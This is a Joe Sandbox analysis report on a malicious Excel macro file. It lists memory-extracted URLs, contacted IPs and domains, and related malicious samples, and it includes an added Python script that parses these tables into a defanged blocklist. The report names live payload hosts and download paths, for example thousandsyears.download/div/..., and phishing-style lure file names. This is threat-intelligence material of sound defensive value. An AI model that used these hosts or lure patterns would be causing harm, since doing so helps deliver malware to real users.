        https://aws.amazon.com/tw/ | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/tr/?nc1=h_ls | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/fr/?nc1=h_ls | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://d1fgizr415o1r6.cloudfront.net | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://a0.awsstatic.com/libra-search/1.0.13/js | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://amazon.com/w | regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp | false | | high
        https://prod-us-west-2.csp-report.marketing.aws.dev/submit | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        https://f0.awsstatic.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp | false | | high
        https://spot-bid-advisor.s3.amazonaws.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/ | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmp | false | | high
        https://d3ctxlq1ktw2nl.cloudfront.net | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp | false | | high
        https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://amazonwebservices.d2.sc.omtrdc.net | regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        https://aws.amazon.com/podcasts/aws-podcast/ | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp | false | | high
        https://d1yyh5dhdgifnx.cloudfront.net | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/jp/ | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://d1hemuljm71t2j.cloudfront.net | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp | false | | high
        https://a0.awsstatic.com/libra-css/css/1.0.382 | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://view-stage.us-west-2.prod.pricing.aws.a2z.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://s3.amazonaws.com/public-pricing-agc/ | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
                                                                                                                https://aws.amazon.com/de/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://investor.msn.com/regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.pngregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.%s.comPAregsvr32.exe, 00000004.00000002.2105513223.0000000002CA0000.00000002.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          low
                                                                                                                          https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=defaultregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://a0.awsstatic.comregsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=ficoregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://ssl-static.libsyn.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://website.spot.ec2.aws.a2z.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://112-tzm-766.mktoutil.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://static.doubleclick.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://aws.amazon.com/th/?nc1=f_lsregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://investor.msn.comregsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://aws.amazon.com/tr/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://a0.awsstatic.com/g11n-lib/2.0.76regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://s0.awsstatic.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.amazon.jobs/awsregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.pngregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://googleads.g.doubleclick.netregsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://s3.amazonaws.com/aws-messaging-pricing-information/regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://download.stormacq.com/aws/podcast/regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.jsregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://console.aws.amazon.com/support/home?nc2=h_ql_curegsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svgregsvr32.exe, 00000004.00000003.2100757073.0000000003620000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://d2908q01vomqb2.cloudfront.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://dgen8gghn3u86.cloudfront.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://pages.awscloud.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://aws.amazon.com/vi/?nc1=f_lsregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://a0.awsstatic.com/aws-blog/1.0.47/jsregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://chtbl.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://dk261l6wntthl.cloudfront.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.cssregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://console.aws.amazon.com/billing/home?nc2=h_m_bcregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://amazonwebservicesinc.tt.omtrdc.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://twitter.com/awscloudregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.198.51 | thousandsyears.download | United States | 13335 | CLOUDFLARENETUS | false
13.224.92.73 | dr49lng3n1n2s.cloudfront.net | United States | 16509 | AMAZON-02US | false
104.21.37.209 | astrocycle.download | United States | 13335 | CLOUDFLARENETUS | true
172.67.146.88 | uppercilio.fun | United States | 13335 | CLOUDFLARENETUS | false
172.67.194.117 | voopeople.fun | United States | 13335 | CLOUDFLARENETUS | false
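The URL table and the Contacted IPs table are what an analyst turns into blocklist entries, and in this report the URL table is dominated by aws.amazon.com page assets recovered from regsvr32.exe memory, with only a handful of unknown-reputation hosts and a single contact the sandbox marked malicious. The script below is an added example for this page, not part of the Joe Sandbox report: it parses both tables in the fused form the extracted page presents them in (sample rows copied from the tables above are embedded as constructed input), separates the flagged contact from the benign noise, and defangs the result for sharing. The SOURCE_PROCESSES tuple and the triage rules (skip entries with reputation "high", skip printf-style templates such as http://www.%s.com that system libraries leave in memory) are the example's own assumptions.

```python
"""Turn the flattened 'URLs' and 'Contacted IPs' rows of a Joe Sandbox report
into indicators. Added example for this page; not part of the report."""
import re
from dataclasses import dataclass, field

# Process names that appear in the 'Source' column of this report's URL table.
# Assumption: for another report, extend the tuple from its process tree.
SOURCE_PROCESSES = ("regsvr32.exe",)
_PROC_ALT = "|".join(re.escape(p) for p in SOURCE_PROCESSES)

_IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# DNS name (lower case) fused with a country name, which starts with a capital.
_DOMAIN_COUNTRY_RE = re.compile(r"^([a-z0-9.-]+)([A-Z].*)$")
# ASN number, ASN name and the boolean 'Malicious' column fused together.
_ASN_RE = re.compile(r"^(\d+)(.+?)(true|false)$")
# URL fused with one or more 'process, dump-id.sdmp' sources and 'Malicious'.
_URL_ROW_RE = re.compile(
    rf"^(?P<url>.+?)(?P<src>(?:{_PROC_ALT}), .+?\.sdmp)(?P<mal>true|false)$")
_SOURCE_RE = re.compile(rf"(?:{_PROC_ALT}), [0-9A-Fa-f.]+\.sdmp")

# Constructed input: the five 'Contacted IPs' rows of this report, in the
# three-lines-per-row layout of the extracted page.
CONTACTED_IPS_TEXT = """\
172.67.198.51
thousandsyears.downloadUnited States
13335CLOUDFLARENETUSfalse
13.224.92.73
dr49lng3n1n2s.cloudfront.netUnited States
16509AMAZON-02USfalse
104.21.37.209
astrocycle.downloadUnited States
13335CLOUDFLARENETUStrue
172.67.146.88
uppercilio.funUnited States
13335CLOUDFLARENETUSfalse
172.67.194.117
voopeople.funUnited States
13335CLOUDFLARENETUSfalse
"""

# Constructed input: four rows of the URL table (URL + sources + 'false' on
# one line, optional '•' antivirus verdicts, then the reputation line).
URL_ROWS_TEXT = """\
https://aws.amazon.com/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmpfalse
high
http://www.%s.comPAregsvr32.exe, 00000004.00000002.2105513223.0000000002CA0000.00000002.00000001.sdmpfalse
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
low
https://chtbl.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
• Avira URL Cloud: safe
unknown
https://download.stormacq.com/aws/podcast/regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
• Avira URL Cloud: safe
unknown
"""


@dataclass
class Contact:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    malicious: bool


@dataclass
class UrlHit:
    url: str
    sources: list
    malicious: bool
    av_verdicts: list = field(default_factory=list)
    reputation: str = ""


def parse_contacted_ips(text):
    """Three lines per row: IP / domain+country / ASN+ASN name+malicious."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 3:
        raise ValueError("contacted-IP rows must come in groups of three lines")
    contacts = []
    for ip, dom_line, asn_line in zip(lines[0::3], lines[1::3], lines[2::3]):
        dm, am = _DOMAIN_COUNTRY_RE.match(dom_line), _ASN_RE.match(asn_line)
        if not (_IP_RE.match(ip) and dm and am):
            raise ValueError(f"unrecognised row: {ip!r} / {dom_line!r} / {asn_line!r}")
        contacts.append(Contact(ip, dm[1], dm[2], int(am[1]), am[2], am[3] == "true"))
    return contacts


def parse_url_rows(text):
    """One URL line, zero or more '•' verdict lines, then the reputation line."""
    hits, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _URL_ROW_RE.match(line)
        if m:
            current = UrlHit(m["url"], _SOURCE_RE.findall(m["src"]), m["mal"] == "true")
        elif current is None:
            raise ValueError(f"verdict or reputation without a URL row: {line!r}")
        elif line.startswith("•"):
            current.av_verdicts.append(line[1:].strip())
        else:
            current.reputation = line
            hits.append(current)
            current = None
    if current is not None:
        raise ValueError(f"URL row without a reputation line: {current.url}")
    return hits


def triage(contacts, hits):
    """Flagged contacts go to the blocklist; URLs that are neither well known
    (reputation 'high') nor printf-style templates go to manual review."""
    block = [c for c in contacts if c.malicious]
    review = [h for h in hits if h.reputation != "high" and "%" not in h.url]
    return block, review


def defang(indicator):
    """Make an indicator safe to paste into a ticket or chat."""
    return re.sub(r"^http", "hxxp", indicator).replace(".", "[.]")


def blocklist(contacts):
    """Defanged IP and domain of every contact the sandbox marked malicious."""
    out = []
    for c in contacts:
        if c.malicious:
            out += [defang(c.ip), defang(c.domain)]
    return out


if __name__ == "__main__":
    contacts = parse_contacted_ips(CONTACTED_IPS_TEXT)
    block, review = triage(contacts, parse_url_rows(URL_ROWS_TEXT))
    print("block :", blocklist(contacts))
    print("review:", [defang(h.url) for h in review])
```

Run against the embedded rows, the blocklist holds only 104[.]21[.]37[.]209 / astrocycle[.]download, and the review queue holds the two unknown-reputation hosts; the aws.amazon.com row drops out on reputation and the http://www.%s.com template on the "%" check. The parsers raise on any line they cannot place rather than silently skipping it, so a rendering change in the report shows up as an error instead of a missing indicator.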

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 444806
Start date: 06.07.2021
Start time: 17:48:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 33s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: LL52387-01M4205301.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA (Hybrid Code Analysis) enabled
• EGA (Execution Graph Analysis) enabled
• HDC (Hybrid Decompilation) enabled
• AMSI (Antimalware Scan Interface) enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@7/4@7/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 70.6% (good quality ratio 56.6%)
• Quality average: 70.2%
• Quality standard deviation: 40%
HCA Information:
• Successful, ratio: 78%
• Number of executed functions: 13
                                                                                                                                                                                    • Number of non-executed functions: 3
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                                                    • Scroll down
                                                                                                                                                                                    • Close Viewer
                                                                                                                                                                                    Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match                    Associated Sample Name / URL      Detection  Context
172.67.198.51            Outfordelivery389402.xlsm         malicious  thousandsyears.download/div/44376,8555986111.jpg
                         LL52387-01-F4448869.xlsm          malicious  thousandsyears.download/div/44376,8555986111.jpg
                         HRScheduleH3965005.xlsm           malicious  thousandsyears.download/div/44376,8555986111.jpg
                         PI-9823472110866.xlsm             malicious  thousandsyears.download/div/44376,8555986111.jpg
                         uhr908723097306.xlsm              malicious  thousandsyears.download/div/44376,8555986111.jpg
                         Vac.list07-2021-6014910.xlsm      malicious  thousandsyears.download/div/44376,8555986111.jpg
                         Vac.list07-20214862208.xlsm       malicious  thousandsyears.download/div/44376,8555986111.jpg
                         List-4527768.xlsm                 malicious  thousandsyears.download/div/44376,8555986111.jpg
                         HRcontacts7752205.xlsm            malicious  thousandsyears.download/div/44376,8555986111.jpg
                         sbf0127365-7431059.xlsm           malicious  thousandsyears.download/div/44376,8555986111.jpg
                         Outfordelivery799862.xlsm         malicious  thousandsyears.download/div/44376,8555986111.jpg
                         Purchaseconfirmation-137606.xlsm  malicious  thousandsyears.download/div/44376,8555986111.jpg
                         DeliveryConf535215.xlsm           malicious  thousandsyears.download/div/44376,8555986111.jpg
                         PI-210610.xlsm                    malicious  thousandsyears.download/div/44376,8555986111.jpg
13.224.92.73             Outfordelivery389402.xlsm         malicious
                         LL52387-01-F4448869.xlsm          malicious
                         Schedule-982347-Y6844315.xlsm     malicious
                         HRScheduleH3965005.xlsm           malicious
                         sbf0127365-7431059.xlsm           malicious
                         Outfordelivery799862.xlsm         malicious
                         Purchaseconfirmation-137606.xlsm  malicious
                         DeliveryConf535215.xlsm           malicious

                                                                                                                                                                                                    Domains

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                    voopeople.funOutfordelivery389402.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    LL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.21.12.122
                                                                                                                                                                                                    uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.21.12.122
                                                                                                                                                                                                    Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.194.117
                                                                                                                                                                                                    thousandsyears.downloadOutfordelivery389402.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    LL52387-01-F4448869.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.21.52.111
                                                                                                                                                                                                    HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.21.52.111
                                                                                                                                                                                                    sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 172.67.198.51
                                                                                                                                                                                                    uppercilio.funOutfordelivery389402.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.21.55.83
LL52387-01-F4448869.xlsm | malicious | 104.21.55.83
Schedule-982347-Y6844315.xlsm | malicious | 172.67.146.88
HRScheduleH3965005.xlsm | malicious | 172.67.146.88
PI-9823472110866.xlsm | malicious | 172.67.146.88
uhr908723097306.xlsm | malicious | 104.21.55.83
Vac.list07-2021-6014910.xlsm | malicious | 104.21.55.83
Vac.list07-20214862208.xlsm | malicious | 172.67.146.88
List-4527768.xlsm | malicious | 172.67.146.88
HRcontacts7752205.xlsm | malicious | 104.21.55.83
Formtofill4184860.xlsm | malicious | 172.67.146.88
sbf0127365-7431059.xlsm | malicious | 104.21.55.83
Outfordelivery799862.xlsm | malicious | 104.21.55.83
Purchaseconfirmation-137606.xlsm | malicious | 104.21.55.83
DeliveryConf535215.xlsm | malicious | 104.21.55.83
PI-210610.xlsm | malicious | 104.21.55.83

                                                                                                                                                                                                    ASN

Match | Associated Sample Name / URL | Detection | Context

Match: CLOUDFLARENETUS
Outfordelivery389402.xlsm | malicious | 172.67.194.117
PO No.179989 - H#U00f6rmann Mexico S.a.de C.v..exe | malicious | 104.21.19.200
LL52387-01-F4448869.xlsm | malicious | 172.67.194.117
13076885-RFQ.doc | malicious | 104.21.19.200
Schedule-982347-Y6844315.xlsm | malicious | 172.67.194.117
HRScheduleH3965005.xlsm | malicious | 172.67.194.117
Cava.com_Fax-Message.htm | malicious | 104.16.18.94
VM52MC9YQDUO0P.html | malicious | 104.16.18.94
PI-9823472110866.xlsm | malicious | 104.21.12.122
uhr908723097306.xlsm | malicious | 172.67.194.117
Vac.list07-2021-6014910.xlsm | malicious | 172.67.194.117
Vac.list07-20214862208.xlsm | malicious | 172.67.194.117
List-4527768.xlsm | malicious | 172.67.194.117
HRcontacts7752205.xlsm | malicious | 172.67.194.117
Formtofill4184860.xlsm | malicious | 172.67.194.117
sbf0127365-7431059.xlsm | malicious | 104.21.12.122
runsys32.dll | malicious | 104.20.185.68
Outfordelivery799862.xlsm | malicious | 172.67.194.117
Purchaseconfirmation-137606.xlsm | malicious | 172.67.194.117
DeliveryConf535215.xlsm | malicious | 172.67.194.117

Match: AMAZON-02US
